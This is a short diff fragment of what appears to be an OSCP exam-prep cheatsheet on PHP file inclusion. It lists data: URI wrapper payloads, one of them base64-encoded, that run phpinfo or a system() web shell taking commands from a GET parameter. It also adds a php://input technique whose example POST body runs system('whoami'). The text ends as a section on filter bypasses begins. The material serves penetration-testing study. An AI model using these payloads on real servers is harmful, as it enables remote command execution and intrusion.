camercu/oscp-prep/CHEATSHEET.md

 data:text/plain,<?php phpinfo(); ?>
 data:,<?system($_GET['x']);?>&x=ls
 data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls

+# Use 'php://input' as the query param's value to tell it to look at the POST
+# request body for the text to insert there.
+Useful for injecting complex
+# php payloads
+php://input
+# example POST body: <?php system('whoami'); ?>

 # FILTER BYPASSES:
 # Sometimes you can bypass filters or trick PHP not to concatenate a .php file extension onto